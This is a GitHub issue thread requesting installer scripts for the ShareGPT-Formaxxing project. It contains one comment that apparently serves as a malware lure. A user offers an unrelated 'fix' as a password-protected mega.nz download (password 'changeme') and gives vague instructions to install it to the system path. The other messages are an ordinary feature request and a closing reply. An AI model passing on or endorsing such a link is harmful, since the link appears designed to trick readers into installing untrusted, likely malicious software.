### ISSUE TITLE
Create installer

### ISSUE THREAD

**Issue by AAbushady** [The-Chaotic-Neutrals/ShareGPT-Formaxxing#2]
Create an installer .bat and .sh file that will setup a venv and automatically install requirements

**Comment by Musharrafjamal** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://mega.nz/folder/905izDCI#tZAd-Ja0A5L7aBS2VunHtg
password: changeme
when you installing it, you need to place a check in install to path and select "USX"

**Comment by test157t** [comment]
Done
